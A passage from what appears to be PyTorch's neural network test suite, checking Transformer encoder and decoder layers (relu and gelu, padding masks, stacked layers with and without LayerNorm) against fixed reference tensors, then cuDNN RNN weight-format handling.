memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# key_padding_mask
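# tgt_key_padding_mask has shape (bsz, tgt_length) = (2, 3); all-False
# masks nothing, so the output must match the unmasked reference.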
key_padding_mask = torch.zeros(2, 3) == 1
result = model(decoder_input, memory_input, tgt_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# key_padding_mask
key_padding_mask[0, 2] = 1
key_padding_mask[1, 1] = 1
key_padding_mask[1, 2] = 1
result = model(decoder_input, memory_input, tgt_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430025, 0.027643, -0.601164, -0.073476],
[2.4323, 0.029375, -0.599553, -0.071881]],
[[2.428523, 0.026838, -0.602226, -0.07391],
[2.432634, 0.029842, -0.599318, -0.071253]],
[[2.432278, 0.028152, -0.599555, -0.074139],
[2.432659, 0.029244, -0.599294, -0.072382]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# memory_key_padding_mask
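# memory_key_padding_mask has shape (bsz, seq_length) = (2, 5); again the
# all-False case must reproduce the unmasked reference.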
key_padding_mask = torch.zeros(2, 5) == 1
result = model(decoder_input, memory_input, memory_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# memory_key_padding_mask
key_padding_mask[0, 4] = 1
key_padding_mask[1, 3] = 1
key_padding_mask[1, 4] = 1
result = model(decoder_input, memory_input, memory_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.429757, 0.027358, -0.601351, -0.073816],
[2.432692, 0.028583, -0.599263, -0.073634]],
[[2.428247, 0.02662, -0.602419, -0.074123],
[2.432657, 0.029055, -0.599293, -0.072732]],
[[2.431515, 0.027687, -0.600096, -0.074459],
[2.433075, 0.028543, -0.598987, -0.073985]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
def test_transformerdecoderlayer_gelu(self):
# this is a deterministic test for TransformerDecoderLayer with gelu activation
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
bsz = 2
seq_length = 5
tgt_length = 3
for activation, batch_first in product(('gelu', F.gelu, nn.GELU()), (True, False)):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
model = nn.TransformerDecoderLayer(d_model, nhead, dim_feedforward, dropout,
activation, batch_first=batch_first)
# set constant weights of the model
for idx, p in enumerate(model.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]])
memory_input = torch.tensor([[[60., 70., 80., 90.]]])
result = model(decoder_input, memory_input)
ref_output = torch.tensor([[[2.306435, 0.095946, -0.675796, 0.10687]]])
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]]))
memory_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.415448, 0.054389, -0.610932, -0.0156613]],
[[2.415448, 0.054389, -0.610932, -0.0156613]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]]))
memory_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.338531, 0.087709, -0.65776, 0.080646]],
[[2.338531, 0.087709, -0.65776, 0.080646]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]))
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.42049104, 0.03443088, -0.60793706, -0.05436271],
[2.42210631, 0.03546578, -0.60679895, -0.05357488]],
[[2.41907674, 0.0336104, -0.60892977, -0.05490462],
[2.42216881, 0.03586554, -0.6067524, -0.05289126]],
[[2.42205716, 0.03488046, -0.60683681, -0.05460596],
[2.42240309, 0.0354595, -0.60659063, -0.05378816]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
def test_transformerencoder(self):
def get_a_test_layer(use_cuda, activation, batch_first=False):
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
device = torch.device("cuda" if use_cuda else "cpu")
layer = nn.TransformerEncoderLayer(
d_model,
nhead,
dim_feedforward=dim_feedforward,
dropout=dropout,
activation=activation,
batch_first=batch_first).to(device)
with torch.no_grad():
# set constant weights of the model
for idx, p in enumerate(layer.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
return layer
# this is a deterministic test for TransformerEncoder
activation = F.relu
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
for batch_first in (True, False):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
encoder_layer = get_a_test_layer(use_cuda=use_cuda, activation=activation,
batch_first=batch_first)
model = nn.TransformerEncoder(encoder_layer, 1).to(device)
# deterministic input
encoder_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.428589, 0.020835, -0.602055, -0.085249],
[2.427987, 0.021213, -0.602496, -0.084103]],
[[2.424689, 0.019155, -0.604793, -0.085672],
[2.413863, 0.022211, -0.612486, -0.072490]],
[[2.433774, 0.021598, -0.598343, -0.087548],
[2.425104, 0.019748, -0.604515, -0.084839]],
[[2.436185, 0.022682, -0.596625, -0.087261],
[2.433556, 0.021891, -0.598509, -0.086832]],
[[2.416246, 0.017512, -0.610712, -0.082961],
[2.422901, 0.024187, -0.606178, -0.074929]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# all-False mask (no positions padded): output must match the unmasked reference
mask = torch.zeros([2, 5]).to(device) == 1
result = model(encoder_input, src_key_padding_mask=mask)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
mask[0, 1] = 1
mask[1, 3] = 1
mask[1, 4] = 1
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.429026, 0.020793, -0.601741, -0.085642],
[2.428811, 0.021445, -0.601912, -0.084252]],
[[2.425009, 0.019155, -0.604566, -0.085899],
[2.415408, 0.02249, -0.611415, -0.073]],
[[2.434199, 0.021682, -0.598039, -0.087699],
[2.42598, 0.019941, -0.603896, -0.085091]],
[[2.436457, 0.022736, -0.59643, -0.08736],
[2.434021, 0.022093, -0.598179, -0.08679]],
[[2.416531, 0.017498, -0.610513, -0.083181],
[2.4242, 0.024653, -0.605266, -0.074959]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# test case 2, multiple layers no norm
model = nn.TransformerEncoder(encoder_layer, 2).to(device)
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.419051, 0.017446, -0.608738, -0.085003],
[2.419102, 0.017452, -0.608703, -0.085026]],
[[2.419043, 0.017445, -0.608744, -0.084999],
[2.419052, 0.017446, -0.608738, -0.085004]],
[[2.419067, 0.017448, -0.608727, -0.085010],
[2.419098, 0.017452, -0.608706, -0.085024]],
[[2.419072, 0.017449, -0.608724, -0.085012],
[2.419119, 0.017455, -0.608691, -0.085034]],
[[2.419019, 0.017442, -0.608761, -0.084989],
[2.419075, 0.017449, -0.608722, -0.085014]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
model = nn.TransformerEncoder(encoder_layer, 6).to(device)
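# With six identical layers the encoding saturates: every position
# converges to nearly the same vector, hence the identical rows below.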
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]],
[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]],
[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]],
[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]],
[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# test case 3, multiple layers with norm
# d_model = 4
norm = nn.LayerNorm(4)
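# The final LayerNorm re-normalizes the stack output, so the expected
# values differ from the no-norm cases above.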
model = nn.TransformerEncoder(encoder_layer, 2, norm=norm).to(device)
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[1.695949, -0.357635, -0.893077, -0.445238],
[1.695955, -0.357639, -0.893050, -0.445266]],
[[1.695948, -0.357634, -0.893082, -0.445233],
[1.695950, -0.357635, -0.893077, -0.445238]],
[[1.695951, -0.357636, -0.893069, -0.445246],
[1.695955, -0.357639, -0.893052, -0.445264]],
[[1.695952, -0.357636, -0.893066, -0.445249],
[1.695957, -0.357641, -0.893041, -0.445276]],
[[1.695946, -0.357632, -0.893095, -0.445220],
[1.695952, -0.357637, -0.893065, -0.445251]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
model = nn.TransformerEncoder(encoder_layer, 6, norm=norm).to(device)
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]],
[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]],
[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]],
[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]],
[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
def test_transformerdecoder(self):
def get_a_test_layer(use_cuda, activation, batch_first=False):
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
device = torch.device("cuda" if use_cuda else "cpu")
layer = nn.TransformerDecoderLayer(
d_model,
nhead,
dim_feedforward=dim_feedforward,
dropout=dropout,
activation=activation,
batch_first=batch_first).to(device)
with torch.no_grad():
# set constant weights of the model
for idx, p in enumerate(layer.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
return layer
# this is a deterministic test for TransformerDecoder
for batch_first in (False, True):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
activation = F.relu
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
decoder_layer = get_a_test_layer(use_cuda=use_cuda, activation=activation,
batch_first=batch_first)
model = nn.TransformerDecoder(decoder_layer, 1).to(device)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]]).to(device)
memory_input = torch.tensor([[[60., 70., 80., 90.]]]).to(device)
result = model(decoder_input, memory_input)
ref_output = torch.tensor(
[[[2.314351, 0.094805, -0.671322, 0.101977]]]).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-3)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]])).to(device)
memory_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]]])).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.422245, 0.051716, -0.606338, -0.024756]],
[[2.422245, 0.051716, -0.606338, -0.024756]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-4)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]])).to(device)
memory_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]])).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.343536, 0.085561, -0.654954, 0.074991]],
[[2.343536, 0.085561, -0.654954, 0.074991]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-4)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]
)).to(device)
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# key_padding_mask
key_padding_mask = torch.zeros(2, 3).to(device) == 1
result = model(decoder_input, memory_input,
tgt_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# key_padding_mask
key_padding_mask[0, 2] = 1
key_padding_mask[1, 1] = 1
key_padding_mask[1, 2] = 1
result = model(decoder_input, memory_input,
tgt_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430025, 0.027643, -0.601164, -0.073476],
[2.4323, 0.029375, -0.599553, -0.071881]],
[[2.428523, 0.026838, -0.602226, -0.07391],
[2.432634, 0.029842, -0.599318, -0.071253]],
[[2.432278, 0.028152, -0.599555, -0.074139],
[2.432659, 0.029244, -0.599294, -0.072382]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# memory_key_padding_mask
key_padding_mask = torch.zeros(2, 5).to(device) == 1
result = model(decoder_input, memory_input,
memory_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# memory_key_padding_mask
key_padding_mask[0, 4] = 1
key_padding_mask[1, 3] = 1
key_padding_mask[1, 4] = 1
result = model(decoder_input,
memory_input,
memory_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.429757, 0.027358, -0.601351, -0.073816],
[2.432692, 0.028583, -0.599263, -0.073634]],
[[2.428247, 0.02662, -0.602419, -0.074123],
[2.432657, 0.029055, -0.599293, -0.072732]],
[[2.431515, 0.027687, -0.600096, -0.074459],
[2.433075, 0.028543, -0.598987, -0.073985]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# multiple layers no norm
model = nn.TransformerDecoder(decoder_layer, 2).to(device)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]]).to(device)
memory_input = torch.tensor([[[60., 70., 80., 90.]]]).to(device)
result = model(decoder_input, memory_input)
ref_output = torch.tensor(
[[[2.31316, 0.0950293, -0.671995, 0.102802]]]).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-3)
# multiple layers no norm
model = nn.TransformerDecoder(decoder_layer, 6).to(device)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]
)).to(device)
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.42794, 0.026164, -0.60263, -0.0747591],
[2.43113, 0.0279516, -0.600376, -0.0736896]],
[[2.42794, 0.026164, -0.60263, -0.0747591],
[2.43113, 0.0279516, -0.600376, -0.0736896]],
[[2.42794, 0.026164, -0.60263, -0.0747591],
[2.43113, 0.0279516, -0.600376, -0.0736896]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# multiple layers with norm
# d_model = 4
norm = nn.LayerNorm(4)
model = nn.TransformerDecoder(decoder_layer, 2, norm=norm).to(device)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]]).to(device)
memory_input = torch.tensor([[[60., 70., 80., 90.]]]).to(device)
result = model(decoder_input, memory_input)
ref_output = torch.tensor(
[[[1.66166, -0.326986, -1.01466, -0.320017]]]).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-3)
# multiple layers with norm
model = nn.TransformerDecoder(decoder_layer, 6, norm=norm).to(device)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]
)).to(device)
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[1.69559, -0.357291, -0.894741, -0.443553],
[1.69571, -0.357363, -0.894154, -0.444196]],
[[1.69559, -0.357291, -0.894741, -0.443553],
[1.69571, -0.357363, -0.894154, -0.444196]],
[[1.69559, -0.357291, -0.894741, -0.443553],
[1.69571, -0.357363, -0.894154, -0.444196]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# gelu activation test cases
activation = "gelu"
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
decoder_layer = get_a_test_layer(use_cuda=use_cuda, activation=activation,
batch_first=batch_first)
model = nn.TransformerDecoder(decoder_layer, 1).to(device)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]]).to(device)
memory_input = torch.tensor([[[60., 70., 80., 90.]]]).to(device)
result = model(decoder_input, memory_input)
ref_output = torch.tensor([[[2.306435, 0.095946, -0.675796, 0.10687]]]).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-3)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]])).to(device)
memory_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]]])).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.415448, 0.054389, -0.610932, -0.0156613]],
[[2.415448, 0.054389, -0.610932, -0.0156613]]])).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-4)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]])).to(device)
memory_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]])).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.338531, 0.087709, -0.65776, 0.080646]],
[[2.338531, 0.087709, -0.65776, 0.080646]]])).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-4)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]
)).to(device)
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.42049104, 0.03443088, -0.60793706, -0.05436271],
[2.42210631, 0.03546578, -0.60679895, -0.05357488]],
[[2.41907674, 0.0336104, -0.60892977, -0.05490462],
[2.42216881, 0.03586554, -0.6067524, -0.05289126]],
[[2.42205716, 0.03488046, -0.60683681, -0.05460596],
[2.42240309, 0.0354595, -0.60659063, -0.05378816]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
@unittest.skipIf(not (TEST_CUDNN and TEST_MULTIGPU), 'CUDNN or multi-gpu not available')
def test_cudnn_rnn_dropout_states_device(self):
rnn = nn.RNN(10, 20, num_layers=2, dropout=.5)
device = 1
input = torch.randn(5, 4, 10).cuda(device)
rnn.cuda(device)
hx = torch.randn(2, 4, 20).cuda(device)
output = rnn(input, hx)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_weight_format(self):
rnns = [
nn.LSTM(10, 20, batch_first=True),
nn.LSTM(10, 20, batch_first=True, proj_size=10),
nn.GRU(10, 20, batch_first=True),
nn.RNN(10, 20, batch_first=True)
]
first_warn = True
for rnn in rnns:
rnn.cuda()
input = torch.randn(5, 4, 10, requires_grad=True, device="cuda")
hx = torch.randn(1, 5, 20, requires_grad=True, device="cuda")
all_vars = [input, hx] + list(rnn.parameters())
if isinstance(rnn, nn.LSTM):
# LSTM with projections has different hx size
if rnn.proj_size > 0:
hx = torch.randn(1, 5, 10, requires_grad=True, device="cuda")
all_vars[1] = hx
cx = torch.randn(1, 5, 20, requires_grad=True, device="cuda")
all_vars[2:2] = [cx]
hx = (hx, cx)
output = rnn(input, hx)
output[0].sum().backward()
grads = [v.grad.data.clone() for v in all_vars]
for v in all_vars:
v.grad.data.zero_()
# Weights will no longer view onto the same chunk of memory
weight = all_vars[4]
weight_data = weight.data.clone()
with torch.no_grad():
weight.set_(weight_data)
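# set_() rebinds the parameter to fresh storage, so the RNN weights no
# longer form one contiguous chunk and cuDNN warns on the next forward.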
for _ in range(2):
